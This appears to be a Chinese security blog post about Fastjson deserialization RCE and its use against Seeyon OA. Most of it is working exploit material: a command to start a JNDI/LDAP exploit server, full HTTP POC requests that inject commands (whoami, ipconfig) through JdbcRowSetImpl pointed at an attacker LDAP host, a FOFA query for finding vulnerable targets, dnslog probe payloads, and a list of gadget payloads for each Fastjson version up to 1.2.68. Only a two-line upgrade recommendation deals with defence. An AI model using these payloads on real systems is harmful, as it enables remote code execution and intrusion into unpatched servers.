Fastjson反序列化和致远OAFastjson漏洞
2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力!
本文主要参考最新雷神众测的文章
漏洞详情
FastJson是啊里巴巴的开源库,主要用于对JSON格式的数据进行解析和打包,常见的RCE漏洞可利用版本从<1.2.24到<1.2.47在到<1.2.68等等
使用工具
在vps上执行以下代码,监听端口和设置本地ip,一般vps或者云服务器可直接设置成0.0.0.0。
java -jar JNDI.jar -i 0.0.0.0 -l 1389
POC
POST 路径 HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
cmd: whoami
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 208
{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x.x.x.x:1399/TomcatBypass/TomcatEcho","autoCommit":true}}
致远OA fastjson漏洞
致远OA也用了这个开源库,因此最近有漏洞爆出
影响范围
FOFA:“seeyon” && region=“xxxx” && after=“2021-01-01”
V7.1、V7.1SP1
V7.0、V7.0SP1、V7.0SP2、V7.0SP3
V6.1、V6.1SP1、V6.1SP2
V6.0、V6.0SP1
V5.6、V5.6SP1
POC
POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: 10.1.2.87
Content-Length: 221
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
cmd: ipconfig
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=26FF8158707BB0896A3ACD66EB92DD41; loginPageURL=
Connection: close
_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xx.xxx.xxx.xxx:1289/TomcatBypass/TomcatEcho","autoCommit":true}}
漏洞复现
漏洞检测
JNDI影响范围:
1、rmi的利用方式:适用jdk版本:JDK 6u132、JDK 7u122、JDK 8u113之前
2、ldap的利用方式:适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前
未报错poc
{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}}
{"x":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}
报错,但仍有效
{"x":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"x":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}]}
报错,且返回400,但仍有效
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:0}
Fastjson时间线和POC
fastjson<=1.2.24(CNVD-2017-02833)
{"v24":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}
fastjson<=1.2.41
{"v41":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}
fastjson<=1.2.42
{"v42":{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}
fastjson<=1.2.43
{"v43":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://0.0.0.0","autoCommit":true]}}}
fastjson<=1.2.45
{"v45":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"},"xxx":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://0.0.0.0"}}}
fastjson<=1.2.47(CNVD-2019-22238)
{"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}
fastjson<=1.2.59
{"v59_error":{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://127.0.0.1"}}
{"v59_error":{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://127.0.0.1"}}
fastjson<=1.2.61
{"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"rmi://127.0.0.1"}}
{"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://127.0.0.1","Object":"a"}}
fastjson<=1.2.62
{"v62":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://0.0.0.0"}}
{"v62_error":{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://0.0.0.0"}}}
{"v62_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://0.0.0.0"}}
{"v62_error":{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor","parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://0.0.0.0"},"namespace":""}}
fastjson<=1.2.66
{"v66":{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://0.0.0.0"],"Realms":[""]}}
{"v66":{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://0.0.0.0"}}
{"v66_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://0.0.0.0"}}
{"v66_error":{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://0.0.0.0"}}
fastjson<=1.2.68
写文件覆盖方法
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://0.0.0.0"}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://0.0.0.0"}
实战记录
自行准备:JNDI-Injection-Exploit
(https://github.com/welk1n/JNDI-Injection-Exploit)
使用方法不在过多介绍
dnslog初步探测
命令执行探测
有请求表示, ping命令执行成功
回显姿势
修复建议
1.升级fastjson组件版本到最新
2.升级oa系统